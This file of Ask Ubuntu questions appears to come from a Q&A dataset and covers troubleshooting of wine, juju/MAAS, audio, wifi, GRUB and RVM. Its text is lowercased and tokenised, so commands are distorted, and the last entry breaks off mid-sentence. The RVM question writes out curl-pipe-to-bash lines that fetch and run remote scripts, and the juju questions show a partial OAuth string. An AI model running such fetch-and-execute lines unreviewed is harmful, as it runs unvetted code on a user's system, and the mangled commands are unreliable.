471715	14.04 , ld_library_path fails after setcap cap_sys_ptrace=eip ?	ex . wine notepad will run , unless i do this : sudo setcap cap_sys_ptrace=eip `` `which wineserver` '' sudo setcap cap_sys_ptrace=eip `` `which wine-preloader` '' after that i get this error : /home/myuser/wine1.7.19/usr/bin/wine : error while loading shared libraries : libwine.so.1 : can not open shared object file : no such file or directory the ldd which wine is : linux-gate.so.1 = > ( 0xf772b000 ) libwine.so.1 = > /home/myuser/wine1.7.19/usr/bin/../lib/i386-linux-gnu/libwine.so.1 ( 0xf7550000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf7530000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xf7528000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf7378000 ) /lib/ld-linux.so.2 ( 0xf7708000 ) it finds libwine.so.1 because ld_library_path is set properly , unless the capability is set , the lib is still found ! but i get that error message ... there is this answer , but i dont want to use ldconfig as my wine versions are at user home , and chown to a normal user . i dont want either to set the whole system with /proc/sys/kernel/yama/ptrace_scope . is there any workaround for that ? if you know why ld_library_path fails , i would like to know too , but a workaround should suffice , thx !
471718	juju bootstrap tries to get juju tools from amazon when in a maas enviroment	anyone knows why ... . optiplex-320 : ~ $ juju version 1.16.3-precise-amd64 optiplex-320 : ~ $ juju bootstrap warning no tools available , attempting to retrieve from https : //juju-dist.s3.amazonaws.com/ my environments.yaml is default : maas environments : maas : type : maas maas-server : 'http : //xxx.xxx.xxx.xxx/maas/' maas-oauth : '3ey3ruewp2x4asfahj : cmr3fpyatbwxhvx8 : : : :sample' admin-secret : '' authorized-keys-path : /home/xxxxxxx/id_rsa.pub
471723	how can i use c++11 's < regex > on ubuntu ?	i normally use the g++ compiler , but i do n't have anything against using clang++ . reading about this , i get the idea that g++ 's implementation of c++11 's regex might not compile , and if it does , it might crash at runtime . so i was going to try clang++ . i had the following test file : # include < regex > int main ( ) { return 0 ; } when i try to compile with clang++ -std=c++11 -stdlib=libc++ test.cpp -o test.cpp , i get the error : # include < regex > ^ 1 error generated . what am i missing ? do i need to install a specific package ? am i trying to do it the hard way with clang++ , and i should just use g++ ?
471725	low graphics mode help	how do you get rid of the low graphics mode ... as soon as ubuntu loads up my screen locks up ... how do i set the graphics mode so i can get back in my screen ? i
471729	how to remove ruby 1.9.1 keeping ruby 2.0.0 ?	i have ruby 2.0.0 installed on ununtu 14.04 but i ca n't remove ruby 1.9.1 . i replaced the /usr/bin/ruby symbolic link to ruby2.0.0 , but hhen installing new gems i always get pointed to ruby 1.9.1 . how can i definitely switch to ruby 2.0.0 ?
471731	the artsearch plugin has been deactivated in rhythmbox .	i want to install album art search in the rhythmbox . like but when i select the plug-in appear for me error : conflicting plugin found . the artsearch plugin has been deactivated see the pic i already install rhythmbox plugins overview here how can i use this album art search ?
471732	ps2 eyetoy recording quality	i have ubuntu 12.04 lts and a ps2 eyetoy `` namtai '' . do n't worry - this is not the sterotypical `` how do i get my eyetoy working '' question . my eyetoy works fine on cheese , gucview and various other media software like vlc . however , it seems like i am capped by 25fps . if i recall , the eyetoy is much better than this ( ~60fps ) but can not find any way to fix this . the best program that i have have found is vlc because its advanced options allow you to change many settings but the framerate setting appears to have no effect . what software or settings can i use to take full advantage of my eyetoy ? to give you the full information i wish to attach multiple eyetoys to the system and record from all of them . ( security software like motion and zoneminder , i could n't get installed correctly on my system- so i have n't tried those yet ) . edit - i tried the same camera on a windows system and the frame rate is much better in vlc compared to the ubuntu system . mind you with default settings in windows vlc , the resolution is n't great . however , in skype for example the resolution is amazing and the framerate is good . it seems there must be some settings i am missing somewhere because it does n't appear to be a hardware problem ... edit2 - these images were taken seconds apart - top ps2 eyetoy ( better quality , worse framerate ) , bottom ps3 eyetoy ( terrible quality , good framerate )
471733	wifi problems after downing de laptop lid	i have a problem with my new ubuntu 14.04 . when i shut down temporaly the pc ( for example , downing the laptop lid ) , i can not connect wifi . on the panel , on the wirelees settings is wroten ( more or less ) : `` the hardware has disabled the wifi button '' . thank you
471736	ubuntu 14.04 start too slow but shutdown too fast	how do i do speed up ubuntu like in this link - disable service : http : //ubuntuforums.org/showthread.php ? t=89491 bootchart
471740	maas does not report to juju that the bootstrap node is ready ?	juju bootstrap starts up the node . the node loads , and then nothing . i get a juju status of no reachable server , it 's like maas does not report to juju that the node is ready for juju . maas ui does show the node as allocated . that is where it stays until i issue juju destroy-environment , which maas executes to the letter , shutting down the node and then shows the node as `` ready '' in the maas ui . i waited an hour and watched the node load before running the destroy command . error details no reachable server structure : i have the maas-region and cluster running off one dell 1800 running ubuntu 12.04.4 server . eth0 is internet connected @ xxx.xxx.xxx.100 , to the public switch ( which gives me xxx.xx.xxx.100/maas and full internet access ) eth1 is connected to private none managed gigabit switch , eth1 set to xx.xx.xx.1. , eth1 is set to manged with maas dns/dhcp hosting the all 10 dell 1950 gen 2s . servers get internal addressing . all machines commission and enlisted and become ready normally . i install juju client on a machine operating in the public side on the connection , running ubuntu 12.4.4 64 bit i can access the maas ui , and everything is looks normal . then the juju client from configuration to access becomes overwhelming . 1st errors come when for some reason juju tries to get the needed tools from amazomaws . ( remember i am in maas ) . the 2nd is that if i do n't tell it where to find the authorized keys it does not go . my environments.yaml is default : maas environments : maas : type : maas maas-server : 'http : //xxx.xxx.xxx/maas/ ' maas-oauth : '3ey3ruewp2x4asfahj : cmr3fpyatbwxhvx87x : sample ' admin-secret : '' authorized-keys-path : /xxx/xxxxx/id_xxx.pub after all correction i just get the above described .
471741	deadlock-broken packages during ubuntu 12.4 update : libjpeg-turbo8 : amd64 and libjpeg-turbo8 : i386	the problem i have not used my ubuntu 12.4 ( 64 bit ) netbook for about a year , and yesterday i tried to install one year worth of updates at once . the update did not go smoothly : i had to restart the netbook a few times because the update manager behaved strange . now i have about a half of the new packages installed , and i can not go any further because i have two broken packages : libjpeg-turbo8 and libjpeg-turbo8 : i386 . i did not have any third-party repositories enabled , but the unsupported updates ( precise-backports ) option had been enabled . what i have tried when i use sudo apt-get install -f i get an error message : dpkg : error processing libjpeg-turbo8 ( -- configure ) : libjpeg-turbo8 : amd64 1.1.90+svn733-0ubuntu4.1 can not be configured because libjpeg-turbo8 : i386 is in a different version ( 1.1.90+svn733-0ubuntu4.3 ) dpkg : error processing libjpeg-turbo8 : i386 ( -- configure ) : libjpeg-turbo8 : i386 1.1.90+svn733-0ubuntu4.3 can not be configured because libjpeg-turbo8 : amd64 is in a different version ( 1.1.90+svn733-0ubuntu4.1 ) i looks like libjpeg-turbo8 : amd64 and libjpeg-turbo8 : i386 are in a deadlock : neither can be installed/configured because the other has a different version . i can not remove the broken packages , because too many other programs depend on them and would be removed too . the mark for upgrade and mark for reinstallation options in synaptic do not work either . neither does the force version ... menu . how can i solve the problem ?
471744	how to ignore /dev/sda in boot drive sense ?	i want to make an old ( to use the correct term , ancient ) laptop work with ubuntu 14.04 . the hard drive installed does n't function correctly , and therefore ubuntu has lots to complain about . here is the error : ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata1.00 : bmdma stat 0x25 ata1.00 : failed command : read dma ata1.00 : cmd c8/00:08:00:00:00/00:00:00:00:00/e0 tag 0 dma 4096 in res 51/40:08:00:00:00/00:00:00:00:00/e0 emask 0x9 ( media error ) ata1.00 : status : { drdy err } ata1.00 : error : { unc } end_request : i/o error , dev sda , sector x buffer i/o error on device sda , logical block x i have tried : adding `` nobootwait '' to the /dev/sda line in /etc/fstab inserting `` options libata noacpi=1 '' into /etc/modprobe.d/options before i added `` options libata noacpi=1 '' , it actually got to the shell . now , it just hangs after a few minutes . i do n't want to use or replace the hard drive , because i am using a flash drive to boot from . so , what i need to know is how to get rid of these errors , or tell ubuntu to stop generating the errors .
471746	full mess with bluetooh headset - 14.04	i 've got a brand new bluetooth headphone philips shb7150 with a brand new belkin bluetooth adapter v4 . the pairing is fine but after i can not get the newly discovered headset in my pulseradio . instead i get the following image with erratic behavior when trying to use the bluetooh headset .
471751	how to find the path of a file found in unity 's dash ?	let 's say that , for example , i want to have firefox on my desktop . due to this bug , i ca n't just search for firefox in the dash and drag it onto my desktop . the proposed solution was to simply copy/paste the file . however , i just ca n't figure out how to do that . i can search `` firefox '' in the dash and see the `` firefox web browser '' application . however , when i right click it , it just opens a little dialog with an `` uninstall '' and `` launch '' option . i see no way to actually find out where the file is in order to copy and paste it to my desktop . how can i find the path of an item ( or open the item 's location ) that was found by searching the dash ?
471755	lenovo yoga2 wifi issues with ubuntu 14.04	wireless issues with a brand new lenovo yoga 2 and ubuntu 14.04 every so often , the wireless drops the link and then refuses to reconnect . this often happens right in the middle of a session , and i have to reboot both the computer and the wifi router ( netgear ac1750 ) to get the two to synch . on a related note , i notice that when i boot the yoga 2 with a 13.10 build ( not install it , just run the live image off usb ) , the wireless will connect to the 5ghz band access point , but if i install 13.10 or install any version higher than 13.10 , it only sees the 2ghz band access point . do n't know if these are related . any pointers will be appreciated . otherwise this is a really good laptop with ubuntu . -- prasanna
471756	lost all sound in xubuntu 14.04	the other day , all sound in my xubuntu 14.04 installation suddenly stopped working . i first tried this : rm -r ~/.config/pulse pulseaudio -- kill which was suggested here , but it did n't do the trick . i finally got my sound working again after following this guide , using these commands : sudo apt-get remove -- purge alsa-base pulseaudio sudo apt-get install alsa-base pulseaudio reboot and sudo alsa force-reload this worked for a while but then the sound disappeared again and trying the above steps again does n't work . does anyone have any ideas for what i can try to fix this ? when looking in pavucontrol all i can see is the hdmi output on my gpu , my onboard sound is n't even listed .
471758	canon mf4770n driver installation for ubuntu 14.04	i installed the driver and it seems to be installed fine , since it gets rendered , but it never gets to the printer . it will not even print a test page so far . i would be happy to even use a generic printer driver as i do not need any fancy function ( s ) , i just want to be able to print and scan . the printer is new and was previously used with no problems with windows . thank you , alan
471761	run command as login shell	where is the option for `` run command as login shell '' in the terminal ? cause my terminal has no : edit : menu : stuff in the top bar as i see in some guides .
471762	nvidia hdmi sound and logitech headphones not working in 14.04	there is no sound going from the hdmi port on my nvidia card to my tv that i am using as a monitor . when i use my logitech headphones , i hear no sound either . does anyone know how to rectify the situation ? here 's some screenshots and system information ( sorry if this is too much info ) : ubuntu server 14.04 fluxbox wm sabertooth 990fx/gen3 r2.0 amd fx ( tm ) -8350 eight-core processor geforce gtx 660 ti ( nvidia 331.20 drivers ) logitech g35 headphone/microphone aplay -l output : default playback/recording through the pulseaudio sound server null discard all samples ( playback ) or generate zero samples ( capture ) pulse pulseaudio sound server sysdefault : card=sb hda ati sb , alc892 analog default audio device front : card=sb , dev=0 hda ati sb , alc892 analog front speakers surround40 : card=sb , dev=0 hda ati sb , alc892 analog 4.0 surround output to front and rear speakers surround41 : card=sb , dev=0 hda ati sb , alc892 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=sb , dev=0 hda ati sb , alc892 analog 5.0 surround output to front , center and rear speakers surround51 : card=sb , dev=0 hda ati sb , alc892 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=sb , dev=0 hda ati sb , alc892 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=sb , dev=0 hda ati sb , alc892 digital iec958 ( s/pdif ) digital audio output dmix : card=sb , dev=0 hda ati sb , alc892 analog direct sample mixing device dmix : card=sb , dev=1 hda ati sb , alc892 digital direct sample mixing device dsnoop : card=sb , dev=0 hda ati sb , alc892 analog direct sample snooping device dsnoop : card=sb , dev=1 hda ati sb , alc892 digital direct sample snooping device hw : card=sb , dev=0 hda ati sb , alc892 analog direct hardware device without any conversions hw : card=sb , dev=1 hda ati sb , alc892 digital direct hardware device without any conversions plughw : card=sb , dev=0 hda ati sb , alc892 analog hardware device with all software conversions plughw : card=sb , dev=1 hda ati sb , alc892 digital hardware device with all software conversions hdmi : card=nvidia , dev=0 hda nvidia , hdmi 0 hdmi audio output hdmi : card=nvidia , dev=1 hda nvidia , hdmi 1 hdmi audio output hdmi : card=nvidia , dev=2 hda nvidia , hdmi 2 hdmi audio output hdmi : card=nvidia , dev=3 hda nvidia , hdmi 3 hdmi audio output dmix : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample mixing device dmix : card=nvidia , dev=7 hda nvidia , hdmi 1 direct sample mixing device dmix : card=nvidia , dev=8 hda nvidia , hdmi 2 direct sample mixing device dmix : card=nvidia , dev=9 hda nvidia , hdmi 3 direct sample mixing device dsnoop : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample snooping device dsnoop : card=nvidia , dev=7 hda nvidia , hdmi 1 direct sample snooping device dsnoop : card=nvidia , dev=8 hda nvidia , hdmi 2 direct sample snooping device dsnoop : card=nvidia , dev=9 hda nvidia , hdmi 3 direct sample snooping device hw : card=nvidia , dev=3 hda nvidia , hdmi 0 direct hardware device without any conversions hw : card=nvidia , dev=7 hda nvidia , hdmi 1 direct hardware device without any conversions hw : card=nvidia , dev=8 hda nvidia , hdmi 2 direct hardware device without any conversions hw : card=nvidia , dev=9 hda nvidia , hdmi 3 direct hardware device without any conversions plughw : card=nvidia , dev=3 hda nvidia , hdmi 0 hardware device with all software conversions plughw : card=nvidia , dev=7 hda nvidia , hdmi 1 hardware device with all software conversions plughw : card=nvidia , dev=8 hda nvidia , hdmi 2 hardware device with all software conversions plughw : card=nvidia , dev=9 hda nvidia , hdmi 3 hardware device with all software conversions sysdefault : card=headset logitech g35 headset , usb audio default audio device front : card=headset , dev=0 logitech g35 headset , usb audio front speakers surround40 : card=headset , dev=0 logitech g35 headset , usb audio 4.0 surround output to front and rear speakers surround41 : card=headset , dev=0 logitech g35 headset , usb audio 4.1 surround output to front , rear and subwoofer speakers surround50 : card=headset , dev=0 logitech g35 headset , usb audio 5.0 surround output to front , center and rear speakers surround51 : card=headset , dev=0 logitech g35 headset , usb audio 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=headset , dev=0 logitech g35 headset , usb audio 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=headset , dev=0 logitech g35 headset , usb audio iec958 ( s/pdif ) digital audio output dmix : card=headset , dev=0 logitech g35 headset , usb audio direct sample mixing device dsnoop : card=headset , dev=0 logitech g35 headset , usb audio direct sample snooping device hw : card=headset , dev=0 logitech g35 headset , usb audio direct hardware device without any conversions plughw : card=headset , dev=0 logitech g35 headset , usb audio hardware device with all software conversions aplay -l output : **** list of playback hardware devices **** card 0 : sb [ hda ati sb ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : headset [ logitech g35 headset ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 the volumes for the headset look normal , but the volumes for my hdmi output look like this : in addition , nothing shows up in the hdmi tab in gnome-alsamixer
471763	can not see/use wireless on ubuntu 14.04 server	i just installed ubuntu server 14.04 and during the set up it detected my wireless card and was able to access the internet successfully . however , when installation completed and rebooted , the only interface that is listed by is lo when i type ifconfig . i tried using ifup wlan0 which yields ignoring unknown interface wlan0=wlan0 /etc/network/interfaces does not have any mentions for wlan0 i re-installed the server several times , thinking that it may be me pressing a wrong button during the install but the result was the same . internet works fine with wireless during the install but disappears completely after a reboot , i ca n't even run apt-get . how do i get wireless up and running on my server ? here is output of dmesg | tail and sudo lshw -c network apologies for the format , but ca n't think of a better way of delivering these short of typing .
471764	ca n't download any torrents on any client	every client just stays at 0.0kb no matter how long i wait . i 've tried using u-torrent , transmission , and flush and to no avail . the download is arguably a pretty large download , but i 've downloaded larger . help is appreciated !
471767	what does echo with `` > > '' symbol do ?	i 've seen some command like echo '* - nofile 65535 ' > > /etc/security/limits.conf i know echo print something on the screen . and limits.conf was a file in that /etc/security path . but want does > > do here ? it means something like 'to ' or 'in ' ?
471770	ubuntu 14.04 booting fails	my 14.04 installation stopped bringing up the login screen . installed xubuntu on top , did n't help . all remote operations were still fine , could log in remotely , just not on console , so i followed a lot of leads online , none of which helped . i tried to revert to original 14.04 using upgrade function from boot usb drive . the installation suggested to upgrade my current 14.04 , and then proceeded to locale , then to name of the computer where it suddenly failed and could n't proceed . rebooting from hard drive now fails with error : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have /sbin/init . no init found . try passing init=bootarg . the usual trick of using mount/fsck fails , but the disk appears to be healthy , readable and no failed sectors . i used boot repair utility , which did not help . the output is here . re-installing grub from command line did n't help either . the boot is aborted in the same place . now the installation from the usb drive ca n't even see any operating system installed . no change after attempts of repair with boot utility or re-installing grub . any suggestions other than wiping the hard drive and re-installing the system ?
471772	connection established but no surfing possible	i have ubuntu 12.04 . i tried connecting my tata photon max . though a proper internet connection was established , my browser is not working . i can not use internet .
471776	: wq on vim does not save	by : wq i want save my text file on the vim . but when i run : wq i saw this error e45 : 'readonly ' option is set ( add ! to override ) also when i add ! to : wq like : wq ! .i saw below '' /etc/dhcp/dhcpd.conf '' '' /etc/dhcp/dhcpd.conf '' e212 : ca n't open file for writing i want edit a file name is dhcpd on the /etc/dhcpd path
471781	grub-mkconfig gives error : /usr/sbin/grub-probe : error : failed to get canonical path of `/cow '	i am trying to generate the file /boot/grub/grub.cfg using sudo grub-mkconfig -o /boot/grub/grub.cfg command , which gives me this error : /usr/sbin/grub-probe : error : failed to get canonical path of `` /cow '' . it does not generate the file at all . does anyone know how to solve this issue ?
471782	how to run thunderbird in the background ?	i want to get instant notifications for new emails and i do n't want to install and configure an extra program for that . thunderbird shows notifications , so does gmail webapp . but both of them work only as long as they are open and running ( or minimized ) . is there a way to have thunderbird show notifications without keeping it open ( at least the gui ) ? os : ubuntu 14.04 thanks
471783	my userid and password are correct but i can not log into ubuntu 12.04	i use my username with correct password but i ca n't log into ubuntu 12.04 . how to fix ? i 've not tryed anything .
471785	any news on an sd reader for 12.04 ?	my ubuntu 12.04 will not load an sd card . that is to say , if i insert a simple sd card from my camera it does not show up and i can not get to my pictures . i can find lots of questions on the board asking about this , and the answers are not satisfactory . many of the threads just tail off with requests for printouts of data . but no solution . it would help ubuntu to look more professional if this problem were just to be fixed with an update .
471788	error while installing softwares via wine	i tried to install subway surfers [ exe file ] through wine but it shows an error indicating access denied how to get it fixed
471792	what are the standard environment variables ( $ ) in ubuntu ?	i know some useful environment-variables like $ home , $ uid , $ bash , $ logname etc . which is useful to get information in terminal/command-line with using echo ( ex : echo $ logname ) i want to know what are the useful environment variables available in ubuntu ? in other words where i can find a list of useful standard bash environment-variables for ubuntu with their uses ?
471795	`` not authorized to perform operation '' message in xfce remote desktop	on ubuntu 14.04 i installed xfce to maker remote desktop working . when i rdp to the machine and while performing some tasks like mounting removable usb media i get `` not authorized to perform operation '' message . i got this message when i tried to change some other settings like desktop settings , network settings , etc . this problem has almost made remoted desktop feature useless for me . i could n't perform any administrative task remotely .
471796	using ubuntu server/ communicating with ubuntu server - is this possible ? ( general practice question )	hey ubuntu community , i 'm trying to get familiarized with system control on linux distros on a small scale so that i may be able to carry the knowledge forward to work on hpcs in the near future . while i know that ubuntu is n't the most common distro for scientific cluster computing and that clusters operate a little differently than that i 'd be doing : is it possible to run a desktop as a server ( using the new ubuntu server distro ) and then use a different version of ubuntu on a laptop to communicate with the server ? if not , do the two machines have to be running the same version of the linux distro/ubuntu in this case ? i hope this is n't too rudimentary for this forum , but i could n't find any answers by searching online readily . thank you for your patience and help !
471798	installing rvm in 12.04 ubuntu which is on virtualbox	i have tried a lot of methods but cant get this done . i am trying to install rvm on 12.04 ubuntu . there has been many problems in past like this and i have referred as much as i can and still nothing is working for me . even wirting sudo in front of these doesnt work . what i tried are the following : \curl -l https : //get.rvm.io | bash -s stable -- ruby curl -l get.rvm.io | bash -s stable curl -l raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable i am able to ping each of them though . everytime i get the this error : could n't connect to host or network is unreachable it looks like this : ubuntu @ ubuntu : ~ $ \curl -l https : //get.rvm.io | bash -s stable -- ruby % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : -- : -- 0curl : ( 7 ) could n't connect to host i already tried the solution proposed in unable to install rvm using curl i am using nat adapter for internet and wired connection . i do not have any proxies enabled and all my firewalls are disabled in my hosting os which is windows . my proxy settings for ubuntu are set to none but still i am not able to get this done . can somebody tell me what could be the problem and how to fix it . is it something to do with guest additions because i do n't have that yet .
471801	the fans are noisy	i have an asus laptop that works fine : fast , no overheating etc . my problem is that the fans always run . i find this very annoying because in a silent room they are really loud how can i control their speed ? maybe setting a lower fan speed will fix the problem ? i started here : installed lm-sensors installed fancontrol ran sudo sensors-detect this command outputs an error : $ sudo service module-init-tools restart module-init-tools : unrecognized service is there any hope to fix these noisy fan sounds ? also : $ fancontrol loading configuration from /etc/fancontrol ... error : ca n't read configuration file $ man fancontrol says : for easy configuration , there 's a script named pwmconfig ( 8 ) ... $ sudo pwmconfig [ sudo ] password for ionicabizau : # pwmconfig revision 6166 ( 2013-05-01 ) this program will search your sensors for pulse width modulation ( pwm ) controls , and test each one to see if it controls a fan on your motherboard . note that many motherboards do not have pwm circuitry installed , even if your sensor chip supports pwm . we will attempt to briefly stop each fan using the pwm controls . the program will attempt to restore each fan to full speed after testing . however , it is ** very important ** that you physically verify that the fans have been to full speed after the program has completed . /usr/sbin/pwmconfig : there are no fan-capable sensor modules installed
471802	where has /lib/udev/keymap gone ? how do i adjust keymaps in trusty ?	i tried to use this tutorial to make scroll switch work on my microsoft natural ergonomic keyboard 4000 . but i face following error : sudo : /lib/udev/keymap : command not found i have udev version 204-5ubuntu20.2 ( the version found in trusty ) i noticed that this version does n't include keymap tool . but i notices that greater udev versions ( which available for debian , for example ) include this tool . could somebody explain this diff for me ? = ) and what should i do in this case - install package from debian repo ?
471804	nodejs installation	i have installed node.js and the version is 0.6.12 . i am trying to update it but the efforts are in vain . even though i have installed the latest version the terminal still shows the version as 0.6.12 which means that the installation is not successful . please help . the screen shot :
471805	improve ubuntu 14.04 lts video performance	system info : $ lspci 01:00.0 vga compatible controller : nvidia corporation nv44 [ geforce 6500 ] ( rev a1 ) $ free -m total used free shared buffers cached mem : 7940 7646 294 49 168 3908 -/+ buffers/cache : 3568 4372 swap : 8143 0 8143 cpu : vendor_id : genuineintel cpu family : 6 model : 42 model name : intel ( r ) core ( tm ) i7-2600 cpu @ 3.40ghz stepping : 7 microcode : 0x25 cpu mhz : 1600.000 cache size : 8192 kb $ sudo lshw -short h/w path device class description ====================================================== system system product name ( sku ) /0 bus p8h77-m le /0/0 memory 64kib bios /0/4 processor intel ( r ) core ( tm ) i7-2600 cpu @ 3.40ghz /0/4/5 memory 32kib l1 cache /0/4/6 memory 256kib l2 cache /0/4/7 memory 8mib l3 cache /0/1 memory /0/1/0 memory 4gib dimm ddr3 synchronous 1333 mhz ( 0,8 ns ) /0/58 memory system memory /0/58/0 memory 4gib dimm ddr3 synchronous 1333 mhz ( 0,8 ns ) /0/2 memory /0/3 memory /0/100 bridge 2nd generation core processor family dram controller /0/100/1 bridge xeon e3-1200/2nd generation core processor family pci express root port /0/100/1/0 display nv44 [ geforce 6500 ] /0/100/14 bus 7 series/c210 series chipset family usb xhci host controller /0/100/16 communication 7 series/c210 series chipset family mei controller # 1 /0/100/1a bus 7 series/c210 series chipset family usb enhanced host controller # 2 /0/100/1b multimedia 7 series/c210 series chipset family high definition audio controller /0/100/1c bridge 7 series/c210 series chipset family pci express root port 1 /0/100/1c.5 bridge 7 series/c210 series chipset family pci express root port 6 /0/100/1c.5/0 eth0 network rtl8111/8168/8411 pci express gigabit ethernet controller /0/100/1c.6 bridge 82801 pci bridge /0/100/1c.6/0 bridge asm1083/1085 pcie to pci bridge /0/100/1d bus 7 series/c210 series chipset family usb enhanced host controller # 1 /0/100/1f bridge h77 express chipset lpc controller /0/100/1f.2 storage 7 series/c210 series chipset family 6-port sata controller [ ahci mode ] /0/100/1f.3 bus 7 series/c210 series chipset family smbus controller /0/5 scsi0 storage /0/5/0.0.0 /dev/sda disk 500gb wdc wd5000aakx-0 /0/5/0.0.0/1 /dev/sda1 volume 243mib linux filesystem partition /0/5/0.0.0/2 /dev/sda2 volume 465gib extended partition /0/5/0.0.0/2/5 /dev/sda5 volume 465gib linux lvm physical volume partition /0/6 scsi4 storage /0/6/0.0.0 /dev/cdrom disk cddvdw sh-222bb /1 power to be filled by o.e.m . installed nvidia-304 proprietary driver . the system sometimes getting extremely slow especially performing desktop video effects ( all those fade-ins and fade-outs , blurs , etc . ) previously i had ubuntu 10.04 and i did n't have any issues with performance . is this due to poor video card which is scored just 68 at glmark2 test ? what can i do to improve overall performance ?
471808	how to turn off or delete the default lubuntu panel in 14.04 ?	i am right now experimenting with cairo dock and so far so good . i want to turn off the default lubuntu panel for which currently i dont find a need for . anyone with know how pls help me do this . thanks .
471811	automatically set volume to 100 % on hdmi plug in	i have recently used the script from this post to switch automatically between laptop speakers and hdmi audio output : http : //askubuntu.com/a/395746/284902 . it works perfect , however , does anyone know if there is something i can add to the script to set the volume to 100 % when connected to hdmi and then revert back to previous volume level when disconnected ? thanks , dan
471814	how to give read , write and modify access to folders and files in my home directory mutually to other users on same computer ?	i want to give access to some folders in my home directory to another user on the same computer and vice versa . how do i do this ? right now the other user is able to see the contents but is not able to open , copy , move etc the files from my home directory . i do this easily while sharing with another computer using sshfs method i found else where . but am stuck doing this locally as i am relative rookie still in linux . i am using lubuntu 14.04 . thanks . note : this is a public family computer and this query is to simplify and ease local sharing of files and folders between each other .
471815	weird right click behaviour with razer deathadder 2013 mouse	my razer deathadder 2013 behaves strangely when right clicking . sometimes the context menu closes directly , sometimes it clicks twice ( which chooses a menu item and closes it ) , sometimes it works . when this happens , holding the button keeps the menu open , but is very annoying . i have no idea why , on windows it works without any problems . is there anyway i can debug this ? thanks edit : i tried this to debug , as you can see it presses and releases twice : double @ saturn ~ $ xev | grep button buttonpress event , serial 37 , synthetic no , window 0x4400001 , buttonrelease event , serial 37 , synthetic no , window 0x4400001 , buttonpress event , serial 37 , synthetic no , window 0x4400001 , buttonrelease event , serial 37 , synthetic no , window 0x4400001 , double @ saturn ~ $
471818	error while installing package	e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
471819	can not boot into ubuntu : attempting to read or write from outside hd0	i have a sony viao laptop with windows 7 pre-installed and only a single c drive . i resized the c drive using gparted from a ubuntu live usb and tried to install ubuntu 14.04 alongside windows 7 . however , when i restart the machine i get the error attempting to read or write outside hd0 and the grub-rescue prompt is displayed . using the answer from link , i got the grub booting menu . if i select windows , the windows 7 on dev/sda1 runs fine.but if i select ubuntu from the menu , the same error is displayed and the boot menu is displayed again . i tried a boot repair from the ubuntu usb drive and here is my boot-info-script . boot-info-script i am a novice linux user and i have searched everywhere for answers but none of them work . what should i do ?
471821	pl2303 attached to ttyusb0 - > change it to ttys* ?	i want to read the single status lines ( txd , dtr , ... ) of a pl2303 usb2rs232 converter with statserial . i already attached my pl2303 to the ttyusb0 port . but to read the data , i need the command statserial , wich just accepts ttys* ( if i try to use it with ttyusb* , `` permission denied '' apperars ) . how can you change the ttyusb* to a ttys* `` adress '' ? ? lsusb : gernot @ gernot-lenovo-g505s : ~ $ lsusb bus 002 device 002 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 174f:147b syntek bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 004 : id 0cf3:3004 atheros communications , inc . bus 003 device 002 : id 062a:4101 creative labs bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 002 : id 067b:2303 prolific technology , inc. pl2303 serial port bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub dmesg : ... [ 53.186869 ] iso 9660 extensions : microsoft joliet level 3 [ 54.986337 ] isofs : changing to secondary root [ 76.485704 ] usb 5-1 : new full-speed usb device number 2 using xhci_hcd [ 76.522777 ] usb 5-1 : new usb device found , idvendor=067b , idproduct=2303 [ 76.522786 ] usb 5-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 76.522791 ] usb 5-1 : product : usb-serial controller [ 76.522795 ] usb 5-1 : manufacturer : prolific technology inc. [ 76.557641 ] usbcore : registered new interface driver usbserial [ 76.557658 ] usbcore : registered new interface driver usbserial_generic [ 76.557668 ] usbserial : usb serial support registered for generic [ 76.559702 ] usbcore : registered new interface driver pl2303 [ 76.559719 ] usbserial : usb serial support registered for pl2303 [ 76.560192 ] pl2303 5-1:1.0 : pl2303 converter detected [ 76.588044 ] usb 5-1 : pl2303 converter now attached to ttyusb0 ... thanks for the help ! update : it seems that i was not a member of the dialout group . i added my user to that group using sudo usermod -a -g dialout < username > after that i had permission to access the usb and serial ports . now terminal-programs like moserial work . but i still ca n't access the status lines using statserial . instead i get that message : gernot @ gernot-lenovo-g505s : ~ $ statserial ttyusb0 statserial : ca n't 